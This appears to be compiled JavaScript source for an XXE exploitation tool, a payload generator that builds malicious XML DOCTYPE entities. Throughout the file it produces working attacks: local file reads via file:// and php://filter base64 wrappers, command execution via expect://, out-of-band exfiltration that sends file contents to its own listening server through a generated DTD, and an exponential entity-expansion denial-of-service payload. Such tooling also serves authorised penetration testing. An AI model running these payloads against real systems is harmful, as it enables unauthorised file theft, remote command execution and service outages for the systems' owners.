"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
var XXEServer_1 = require("./XXEServer");
var Type;
(function (Type) {
    Type[Type["file"] = 1] = "file";
    Type[Type["request"] = 2] = "request";
    Type[Type["expect"] = 3] = "expect";
})(Type = exports.Type || (exports.Type = {}));
var Mode;
(function (Mode) {
    Mode[Mode["XML"] = 1] = "XML";
    Mode[Mode["OOB"] = 2] = "OOB";
    Mode[Mode["CDATA"] = 3] = "CDATA";
})(Mode = exports.Mode || (exports.Mode = {}));
var Encoding;
(function (Encoding) {
    Encoding[Encoding["NORMAL"] = 1] = "NORMAL";
    Encoding[Encoding["PHP_BASE64"] = 2] = "PHP_BASE64";
})(Encoding = exports.Encoding || (exports.Encoding = {}));
var PayloadGenerator = /** @class */ (function () {
    function PayloadGenerator(serverAddress, serverPort) {
        if (serverAddress === void 0) { serverAddress = "127.0.0.1"; }
        if (serverPort === void 0) { serverPort = 7777; }
        this.server = new XXEServer_1.XXEServer(serverAddress, serverPort);
    }
    PayloadGenerator.prototype.generate = function (t, mode, encoding, path, template) {
        if (template === void 0) { template = PayloadGenerator.defaultTemplate(); }
        var entities = [];
        var content = PayloadGenerator.stream(path, t, encoding);
        switch (mode) {
            case Mode.XML:
                entities = [{ name: "payload", value: content, parameter: false, system: true }];
                break;
            case Mode.CDATA:
                {
                    var dtdUrl = this.server.addRoute("/cdata.dtd", PayloadGenerator.generateCdataDTD(content));
                    entities = [
                        { name: "extDTD", value: "" + dtdUrl, parameter: true, system: true },
                        "%extDTD;",
                        "%all;"
                    ];
                    break;
                }
            case Mode.OOB: {
                var extractionEnt = { name: "dataextractionfile", parameter: true, value: content, system: true };
                var extractionDTD = this.server.addRoute("/extraction.dtd", this.generateExtractionDTD(extractionEnt, encoding));
                this.server.addExtractionRoute();
                entities = [
                    { name: "extDTD", value: extractionDTD, parameter: true, system: true },
                    "%extDTD;",
                    "%extraction;",
                    "%OOB;"
                ];
                break;
            }
        }
        if (mode === Mode.CDATA || mode === Mode.OOB)
            this.server.start();
        var docType = PayloadGenerator.createDocType(entities);
        var xml = PayloadGenerator.injectDocType(template, docType);
        if (mode === Mode.XML)
            return PayloadGenerator.replacePlaceholderWithEntity(xml, "payload");
        else if (mode === Mode.CDATA)
            return PayloadGenerator.replacePlaceholderWithEntity(xml, "content");
        else
            return PayloadGenerator.replacePlaceholder(xml, "");
    };
    //TODO: need to improve this. 
    //maxNumberOfExpantions should be NumberOfExpantions.
    //JDK has a limit of 64000 expansions :( 
    //TODO: this method should be merged into generate
    PayloadGenerator.xee = function (maxNumberOfExpantions, template) {
        if (maxNumberOfExpantions === void 0) { maxNumberOfExpantions = 64000; }
        if (template === void 0) { template = PayloadGenerator.defaultTemplate(); }
        var entities = [{
                name: "ent0",
                system: false,
                value: "Ea velit aute anim voluptate aliquip id aute dolore do culpa nisi quis officia sunt quis elit ex sed elit."
            }];
        var b = 10;
        var i = 1;
        var expantions = 1;
        while ((expantions * b) <= maxNumberOfExpantions) {
            var ent = { name: "ent" + i, value: PayloadGenerator.callEntity("ent" + (i - 1)).repeat(b), system: false };
            entities.push(ent);
            i++;
            expantions = expantions * b;
        }
        var tmp = PayloadGenerator.createDocType(entities) + template;
        return PayloadGenerator.replacePlaceholderWithEntity(tmp, "ent" + (i - 1));
    };
    PayloadGenerator.generateCdataDTD = function (payloadAction) {
        var payload = PayloadGenerator.createEntityString({ name: "start", value: "<![CDATA[", parameter: true, system: false }) +
            PayloadGenerator.createEntityString({ name: "path", value: payloadAction, parameter: true, system: true }) +
            PayloadGenerator.createEntityString({ name: "end", value: "]]>", parameter: true, system: false });
        var subEntity = PayloadGenerator.createEntityString({
            name: "content",
            value: "%start;%path;%end;",
            parameter: false,
            system: false
        }, Encoding.NORMAL, true);
        payload += PayloadGenerator.createEntityString({ name: "all", value: subEntity, parameter: true, system: false });
        return payload;
    };
    PayloadGenerator.prototype.generateExtractionDTD = function (entity, encoding) {
        //TODO: change this. we can now generate this case with createEntityString
        return PayloadGenerator.createEntityString(entity, encoding) +
            ("<!ENTITY % extraction \"<!ENTITY &#x25; OOB SYSTEM '" + this.server.getServerUrl() + "/?p=%" + entity.name + ";'>\">\n");
    };
    //TODO: allow to change doctype name
    PayloadGenerator.createDocType = function (entities) {
        var dt = "<!DOCTYPE " + PayloadGenerator.DOCTYPE_NAME + " [\n";
        entities.forEach(function (e) {
            if (typeof e === 'string')
                dt += "   " + e + "\n";
            else
                dt += "   " + PayloadGenerator.createEntityString(e);
        });
        dt += "]>\n";
        return dt;
    };
    //inner param is to know if this entity is inside another
    PayloadGenerator.createEntityString = function (entity, encoding, inner) {
        if (encoding === void 0) { encoding = Encoding.NORMAL; }
        if (inner === void 0) { inner = false; }
        var p = " ";
        var system = " ";
        if (entity.parameter) {
            if (inner)
                p = " &#x25; ";
            else
                p = " % ";
        }
        var val = entity.value;
        if ((encoding & Encoding.PHP_BASE64) > 0)
            val = "php://filter/read=convert.base64-encode/resource=file://" + val;
        if (entity.system)
            system = " SYSTEM ";
        if (inner)
            return "<!ENTITY" + p + entity.name + system + "'" + val + "'>";
        else
            return "<!ENTITY" + p + entity.name + system + "\"" + val + "\">\n";
    };
    PayloadGenerator.injectDocType = function (xmlContent, docType) {
        if (xmlContent.includes("<?xml")) {
            var startIndex = xmlContent.indexOf("<?xml");
            var endIndex = xmlContent.indexOf(">", startIndex);
            var xmlDcl = xmlContent.substring(startIndex, endIndex + 1);
            return xmlDcl + "\n" + docType + xmlContent.replace(xmlDcl, "");
        }
        else
            return docType + xmlContent;
    };
    PayloadGenerator.generateString = function () {
        return Math.random().toString(36).substring(7);
    };
    PayloadGenerator.callEntity = function (entityName) {
        return "&" + entityName + ";";
    };
    PayloadGenerator.defaultTemplate = function () {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n    <xxeexploiter>\n      <value>{{XXE}}</value>\n    </xxeexploiter>";
    };
    PayloadGenerator.replacePlaceholderWithEntity = function (xmlPayload, entityName) {
        var replaceWith = PayloadGenerator.callEntity(entityName);
        return PayloadGenerator.replacePlaceholder(xmlPayload, replaceWith);
    };
    PayloadGenerator.replacePlaceholder = function (xmlPayload, replaceWith) {
        return xmlPayload.replace(PayloadGenerator.PLACEHOLDER, "" + replaceWith);
    };
    PayloadGenerator.stream = function (value, type, encode) {
        if (type === void 0) { type = Type.file; }
        if (encode === void 0) { encode = Encoding.NORMAL; }
        if (encode === Encoding.PHP_BASE64)
            return "php://filter/convert.base64-encode/resource=" + value;
        switch (type) {
            case Type.expect: return "expect://" + value;
            case Type.file: return "file://" + value;
            case Type.request: return value;
        }
    };
    PayloadGenerator.PLACEHOLDER = "{{XXE}}";
    PayloadGenerator.PLACEHOLDER_REQUEST_B64 = "{{XXE_B64}}";
    PayloadGenerator.DOCTYPE_NAME = "xxe";
    return PayloadGenerator;
}());
exports.PayloadGenerator = PayloadGenerator;
